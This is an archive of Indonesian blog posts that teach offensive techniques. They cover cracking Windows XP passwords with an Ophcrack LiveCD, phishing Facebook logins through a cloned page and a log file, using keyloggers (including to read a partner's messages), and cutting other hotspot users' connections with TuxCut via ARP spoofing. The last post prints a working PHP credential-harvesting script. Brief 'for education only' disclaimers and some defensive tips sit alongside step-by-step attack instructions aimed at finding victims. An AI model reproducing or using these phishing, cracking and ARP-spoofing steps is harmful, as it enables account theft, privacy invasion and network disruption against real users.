Arsip

Archive for the ‘Hacking’ Category

Hack Windows XP Password dengan Ophcrack

April 21, 2011 4 komentar

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Hebatnya lagi, Ophcrack tersedia dalam bentuk LiveCD, sehingga tidak diperlukan proses instalasi dan tidak perlu password admin, hanya butuh akses agar komputer dapat booting dari CD (biasanya urutan booting default BIOS komputer saat ini dimulai dari CD/DVD ROM, so don’t worry) :-D . Ophcrack LiveCD merupakan Linux yang berbasis SLAX (turunan dari Slackware) dan sudah terdapat Ophcrack dan Rainbow Table untuk cracking password alpanumerik.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Intinya hampir sama dengan cara kerja pwdump6, namun karena Ophcrack menggunakan linux LiveCD sehingga dapat langsung mount file sistem Windows tanpa perlu login ke Windows serta membaca file Hash (windows\system32\config) dan melakukan dump ke file text biasa yang kemudian dapat langsung di crack. Dan hebatnya, tidak perlu Tools seperti JTR lagi, karena crack dilakukan dengan Ophcrack menggunakan Rainbow Table dan memberikan hasil yang sangat cepat.

Pertama kali anda harus mendownload file ISO Ophcrack LiveCD dari sini. Lalu burn ke dalam CD. Dan selanjutnya boot Komputer ‘target’ dari Ophcrack LiveCD, maka akan tampak seperti ini :

boot.JPG

Tekan Enter dan biarkan proses Booting berlangsung. Ophcrack akan otomatis masuk ke windows manager menggunakan fluxbox dan langsung menjalankan Ophcrack. Proses pertama adalah mendapatkan file HASH dari partisi yang berisi file Windows kemudian di dump ke file /tmp/ophcrack.tmp Read more…

Categories: Hacking, Tips & Trik, Tutorial

Hacking Facebook dan Menghindarinya

Maret 9, 2010 Tinggalkan Komentar

Fenomena facebook memang sangatlah menggila, sampai-sampai orangnya juga bisa gila waktu hanya untuk ber-facebook. Menghabiskan waktu demi online facebook. Fakta menunjukkan bahwa hampir semua orang mempunyai account di facebook. Kemudian muncul suatu keinginan jahat yang timbul untuk melakukan suatu hacking account di facebook.

Hacking Facebook

Hacking Facebook

Hacking Facebook

A. Pengertian :
Suatu kegiatan atau cara yang dilakukan untuk mendapatkan email dan password dari sebuah account di facebook.

B. Latar Belakang

  • Iseng
  • Pengen tau aja
  • Ada kecurigaan dalam hubungan

C. Tujuan

  • Sekedar iseng untuk mengisi waktu saja :(
  • Biar tau gimana sih hacking facebook (tambahan ilmu pengetahuan)
  • Ingin melihat pesan masuk (inbok) punya pacar, buat liat selingkuh atau enggak :D

D. Jenis-Jenis Hacking Facebook

  • Menggunakan Keylogger
  • Menggunakan Fake Login
  • yang paling mudah ya tanya aja email & password sama orangnya. hehehe..

1. Hacking Menggunakan Keylogger

keyloggerkeylogger

Keylogger sendiri merupakan suatu program atau software yang berfungsi untuk merekam atau mencatat semua huruf yang diketikkan dari keyboard komputer. Hasil rekaman tadi akan di simpan dalam suatu file notepad (kalo ga salah). Buat yang mau nyoba program ini bisa di download fersi gratisnya atau kalo yang premium googling aja deh pake keywordnya “keylogger site:rapidshare.com”


Keylogger merupakan sebuah perangkat baik perangkat keras atau perangkat lunak yang digunakan untuk memantau penekanan tombol keyboard. Sebuah keylogger biasanya akan menyimpan hasil pemantauan penekanan tombol keyboard tersebut ke dalam sebuah berkas log/catatan/rekaman. Beberapa keylogger tertentu bahkan dapat mengirimkan hasil rekamannya ke e-mail tertentu secara periodik. (sumber : wikipedia)

Jadi misal anda akan login ke facebook, kemudian anda memasukkan email dan password, maka yang anda ketikkan akan tercatat oleh keylogger. Namun, program ini tidak hanya mencatat email dan password, tapi semua huruf-huruf yang diketikkan dari keyboard akan tercatat. Program ini berjalan invisible atau tidak keliatan. Jadi anda harus berhati-hati jika ingin login facebook di warnet atau komputer orang. Kalo komputer sendiri sih ga masalah kan?

Untuk menghindari Keylogger

  • Pastikan komputer yang anda pakai mempunyai antivirus, karena keylogger akan terdeteksi sebagai virus.
  • Jangan biasakan berpindah-pindah komputer diwarnet, usahakan anda sudah mempunyai 1 langganan warnet dan 1 komputer tetap. Jadi setidaknya anda tau isi komputer itu.
  • Sebelum login coba periksa program apa saja yang sedang running anda bisa melihantnya menggunakan Task Manager (Alt + Del) atau biasanya fitur windows ini di disable kalo di warnet. Jadi anda bisa menggunakan alternatif yaitu Auslogics Task Manager portable, jadi anda tidak perlu menginstall, untuk melihat service yang sedang jalan anda dapat klik pada tab service. Dengan program ini anda dapat melihat program apa saja yang sedang jan di komputer anda. Perhatikan kira-kira ada program yang ada keylogger atau tidak.
  • Anda bisa menggunakan visual keyboard. seperti On Screen Keyboard (start – run – ketikkan osk dan enter)
  • Menggunakan software Anti Keylogger

2. Hacking menggunakan Fake Login

Fake Login FacebookFake Login Facebook

Fake login sendiri bisa diartikan sebagai sebuah halaman login boongan. Artinya halaman login ini dibuat sama persis dengan halaman login asli. Namun ada yang membedakannya yaitu alamat url dibagian atas. Contoh halaman Fake Login adalah http://www.bambangoke.com/test-fb/. Tampilannya adalah sama namun perhatikan URL Bagian atasnya bukan http://www.facebook.com.

Cara Membuat Fake Login (sumber : http://apocalytyo.blogspot.com/)

PERTAMA, Donlot dulu file ini Jampi Jampi Buat Fake Login dan info tambahan, untuk mempermudah proses download bisa mendaftar terlebih dahulu di Ziddu.com

KEDUAXX : Kamu extract semua file yang ada didalamnya… trus kamu upload ke layanan hosting file, Kalau sudah terus tinggal Upload semua file Jampi Jampi Buat Fake Login tadi ke tempat hosting.

Terdapat 3 file tersebut yaitu :

- Index.html
- logs.php
- logs.txt

PENTING
Pada file index.html, edit pada bagian alamat hosting

caranya:

Rename/ganti format file Index.html menjadi Index.txt…
kemudian anda tekan CTRL+F lalu cari tulisan http://hostinganlo.com/logs.php
Ganti tulisan http://hostinganlo.com dengan alamat tempat anda menghosting direktori “facebook”. misalkan menjadi : http://www.bambangoke.com/test-fb/logs.php

bila sudah jangan lupa untuk menyimpan.

Setelah itu file index.txt tadi di rename/ganti format lagi menjadi index.html kemudian di upload… !!

KETIGAX: Bila sudah kamu upload semua file tadi, sekarang tinggal kamu coba dengan cara klik file Index.html (misalkan klo punya saya : http://www.bambangoke.com/test-fb/index.html). Udah gitu aja… kok repot…

KEEMPAT,

Setelah beres langkah diatas, sekarang kamu cari korban … (banyak yang gagal nee…tapi sekarang dijamin ndak lagi) Caranya… kamu harus suruh orang lain atau kamu sendirilah… log-in ke facebook dengan jampi jampi yang telah kamu buat tadi….

Kalau sudah nanti kita tinggal melihat account plus passwordnya di Logs.txt

(semoga tidak disalah gunakan, :D .)

Untuk menghindarinya

  • Jangan langsung melakukan login di halaman facebook. Perhatikan dulu alamat URL apakah benar facebook.com atau yang lainnya. intinya must carefull.
  • Jika anda melakukan login ke halaman facebook, namun tidak masuk ke halaman home tetapi dia minta login lagi tapi buka peringatan salah id atau password berarti itu halaman fake login.
  • Lalu bagimana jika sudah terlanjur terkena fake login? Segeralah buka halaman http://www.facebook.com kemudian ganti password anda sesegera mungkin sebelum sang hacker mendahului.
  • Usahakan anda tidak menyamakan antara password login FB dengan password login yahoo atau email. Inilah biasanya yang sering terjadi, kebanyakan orang menyamakan antara password FB dengan Password email demi alasan kemudahan mengingat. Jika password anda sama, kemudian facebook anda terkena fake login, otomatis si hacker juga bisa login ke email anda dan kemudian melakukan apa yang dia mau. hoho :D . ya sudah wasalam.
  • Jika password antara FB dan email berbeda, kemudian FB anda terkena hack anda dapat melakukan forgot password.

3. Hacking dengan Cain dan Abel

Untuk cara ketiga yaitu menggunakan cain dan abel. Prinsip dari prgram ini adalah mensnifing atau menangkap email dan password yang berada pada suatu jaringan LAN. untuk jelasnya anda bisa membaca postingan cain dan abel untuk hacking friendster. Prinsip kerjanya adalah sama.

Demikian sedikit penjelasan tentang hbeberapa jenis hacking yang dapat dilakukan di facebook. sebenarnya tujuan posting diatas adalah sebagai ilmu pengetahuan saja yang nantinya dapat digunakan untuk menghindari terjadinya hacking facebook. kalo masih bingung cari referensi lain jangan tanya aku, soalnya aku juga bukan hacker. :P

Jika ingin menambah saya sebagai Friends di Facebook silahkan di ADD Profile BambangOke tapi jangan di hack ya :(

(gambar diambil dari berbagai sumber sebagi pelengkap posting)

* Info tambahan :

Sebenarnya tujuan awal saya membuat postingan ini adalah kearah bagaimana cara kita agar tidak terkena hacking facebook dengan metode-metode di atas, namun sebagai penulis yang bertanggung jawab. Di sini saya akan menambahkan beberapa penjelasan sebagai respon terhadap banyaknya komentar mengenai cara hacking facebook dengan Fake Login.

  1. Apa itu chmod?
    chmod adalah sebuah ekstensi atau mode di mana sebuah file dapat di eksekusi. Misalnya chmod 777. Ini berati file tersebut dapat di rewrite oleh semua user. Kenapa harus chmod 777. Di sini akan saya jelaskan cara kerja dari fake login itu sendiri. Fake login ini terdiri dari tiga file yaitu index.html, logs.php dan logs.txt. Fungsi masing-masing dari file tersebut, yang pertama adalah index.html ini adalah sebagai halaman tampilan dari sebuah web yang terdapat form yaitu email dan password. Nah ketika kita memasukkan email dan password tadi kemudian email dan password tersebut akan di kirim ke file logs.php yang kemudian oleh logs.php akan di catat atau di masukkan otomatis ke file logs.txt. Jadi itu fungsinya kenapa file logs.txt harus di chmod 777. Apakah masih ada yang belum paham juga? Untuk caranya biasanya sih dah langsung otomatis ketika kita upload ke server hosting.
  2. Liat password hasil hackingnya di mana?
    Seperti penjelasan cara kerja fake login di point 1. Maka password akan di simpan di logs.txt.
  3. Logs.txt nya kosong putih bersih
    Lho mana kok ga ada paswordnya? Jika file logs.txt kosong putih atau blank. Ini kemungkinan mode chmodnya belum 777. Coba anda cek kembali.
  4. Tambahan, program ini dapat berjalan pada hosting yang support PHP. dan tadi saya coba cek ternyata http://fileave.com/ tidak mendukung PHP. Jadi program ini tidak dapat di eksekusi. Untuk pengganti, sangat susah mencari hosting gratisan yang support PHP dan boleh untuk hacking. Kebanyakan mereka tidak mengizinkan file yang bertujuan untuk hacking dan phising. Silahkan baca di TOS masing-masing hosting free tersebut, dan jika ketauan maka account kita akan di hapus oleh pihak hosting. Mungkin ada teman-teman yang tau di mana hosting gratisan support PHP dan boleh untuk hacking? :wink:

Di sini saya akan memberikan halaman contoh :
Saya buat di server tempat saya hosting, namun halam index.html nya saya edit dengan penambahan pemberitahuan bahwa ini adalah hanya bertujuan untuk belajar bukan untuk hacking.

Silahkan buka halaman http://www.bambangoke.com/test-fb/ , kemudian masukkan email dan password sembarang dan klik login. Kemudian untuk melihat hasil password yang terekan ada di http://www.bambangoke.com/test-fb/logs.txt

Terima Kasih, semoga memberi sedikit pencerahan bagi teman-teman. Sekali lagi saya hanya bertujuan untuk metode pembelajaran agar kita terhindar dari hacking facebook.

http://www.bambangoke.com

TuxCut, Pemotong Koneksi Client Hotspot

Maret 3, 2010 2 komentar

TuxCut, sebuah aplikasi yang hampir sama seperti netcut di windows, yang dapat digunakan untuk memotong akses internet pada hotspot, atau sebuah PC LAN workgroup dari client ke server atau sebaliknya dengan memanfaatkan protokol ARP. Program ini dipergunakan oleh pengguna jaringan yang jail dan ingin mengambil jatah bandwith untuk dipakai sendiri. Tuxcut di buat dari bahasa PyQt, untuk lebih jelasnya bisa langsung mengunjungi situs resminya di http://bitbucket.org/a_atalla/tuxcut/src/

Tuxcut agak sedikit berbeda dengan Netcut, di dalam Tuxcut sudah di bundel fitur buat memproteksi kita agar koneksi internet kita tidak bisa dicut atau di potong oleh user lain. Selain itu, ada fitur buat mac scanning dan mac changer-nya juga.. Sebaliknya untuk Netcut, agar kita terproteksi dari user jail yang memakai Netcut, kita harus menginstall program lagi yakni AntiNetcut (meski netcut selalu lebih maju dari anti netcut).

Untuk cara penginstalannya, disini saya menggunakan sistem operasi berbasis kubuntu linux.

1. Download TuxCut, karena kita mau menginstall di kubuntu, kita download debian package di http://bitbucket.org/a_atalla/tuxcut…ut-3.2_all.deb

2. Sebelum menginstall TuxCut, kita perlu menginstall arp-scan arp-tables dan dsniff (membutuhkan koneksi internet agar kebih mudah dalam proses installnya)

a. Install arp-scan dengan perintah
$ sudo apt-get arp-scan

b. Install dsniff dengan perintah
$ sudo apt-get install dsniff

c. Install arptables, download versi arptables terbaru di http://sourceforge.net/projects/ebta…les/arptables/

tar zxf arptables-v0.0.3-3.tar.gz
cd arptables-v0.0.3-3
make && make install

3.Install TuxCut dengan perintah
$ sudo dpkg -i TuxCut-3.2_all.deb

*jika masih terdapat error karena library yang masih kurang, bisa dicoba command berikut: apt-get install -f

Berikut ini screenshoot dari TuxCut yang berhasil di install di kubuntu 9.1:

Untuk mematikan salah satu client, cari ip client yang mau dipotong koneksinya kemudian klik cut. TuxCut bisa digunakan untuk mematikan para NetCut user, tetapi sebaliknya NetCut user tidak bisa meng-cut TuxCut user. Disinilah kelebihan dari TuxCut, biar lebih powerfull lagi, bisa kita kombinasikan dengan membuat rules dengan arp-tables yang kita install tadi. Mungkin lain waktu kita akan bahas sedikit mengenai arp-tables untuk membuat linux kita kebal dari arp poisoning (arp spoofing) untuk lebih jelasnya bisa lihat gambar berikut ini

Sedangkan Untuk melakukan proteksi ARP pada linux kita, yang perlu kita lakukan hanyalah mengaktifkan centang “Protect Me” pada TuxCut. Mudah bukan

Referensi
http://bitbucket.org/a_atalla/tuxcut/wiki/Home
http://sourceforge.net/projects/ebta…les/arptables/

http://jasakom.com

semoga bermanfaat buat temen-temen disini..

Hacking Facebook Dengan Phising

Oktober 13, 2009 6 komentar

DANGGER WITH ATTACKING PHISING

facebook

Facebook merupakan suatu website layanan publik yang bersifat millis. Melalui fitur-fitur dan fasilitas yang ada dalam facebook dapat memudahkan semua orang untuk dapat saling berinteraksi dengan sangat mudahnya. Untuk itu saya akan membahas teknik phising yang biasanya sering digunakan oleh para hacker pemula untuk mengelabuhi dan mengambil ahli (password) akunt di dalam facebook anda, tetapi ingatlah teknik ini saya publikasikan untuk pengetahuan dan pendidikan semata dan bila anda melakukannya dengan sengaja dan diperuntukan untuk bertindak kejahatan melalui teknik ini, seluruhnya adalah tanggung jawab anda baik di dunia dan di akhirat…. Hufh ngeri banged gak tuh peringatan gw. HahHaaa….

Ok gw tau lu dah pada gak sabar kan …….

Teknik phising itu ialah teknik yang digunakan dengan cara mengelabuhi si pengguna komputer untuk masuk ke alamat facebook tetapi alamatnya bukanlah ada pada facebook.com yakni alamatnya disengaja diubah menjadi alamat yang sesuai dengan keinginan si hacker contoh kuroartz.co.cc/fb/facebooknew.html dengan output tampilan yang sama persis seperti facebok.com…. hufh… jadi mulai sekarang anda harus berhati-hatilah dalam setiap mengamati pergerakan link dalam komputer anda….

Nah Berikut ini langkah-langkah dalam melakukan teknik phising tersebut dengan syarat dan ketentuan berlaku…. heHheeee….

  • memiliki domain yang support php seperti ripway……
  • lalu membuat 3 file yang sangat penting dalam satu folder yang sama, yakni :

1. facebook1.html

2. facebooklogin.php

3. rekamanbiru.txt

Cara membuatnya :

  • facebook1.html, dengan cara Ctrl+U pada halaman facebook aslinya lalu copy paste pada web editor seperti dreamweaver or notped, kemudian cari script yang bertuliskan
https://login.facebook.com/login.php?login_attempt=1
Ubah menjadi facebooklogin.php

  • facebooklogin.php, isi dengan script ini :

<?php
header (’Location: https://login.facebook.com/login.php ‘);
$handle = fopen(”rekamanbiru.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

  • rekamanbiru.txt, buat aja di notepad. Biarkan kosong saja ini berguna untuk merangkum semua kebutuhan untuk login pada facebook seperti password, e-mail, dll…

Upload deh ke 3 filenya ke dalam domain yang sudah ada, tapi ingat harus dalam satu folder….

Baiklah semua saya hanya berpesan trik kecil ini mohon tidak dijadikan bahan acuan untuk berbuat kejahatan, tetapi sebagai pengetahuan agar kita sebagai warga negara bangsa Indonesia tidak tertinggal oleh negara lain….

Hasilnya….

1. Form alamat lihat disini

2. Password rekamannya lihat juga disini

3. Kalau Maul lihat semua disini

Ikuti

Get every new post delivered to your Inbox.

Bergabunglah dengan 187 pengikut lainnya.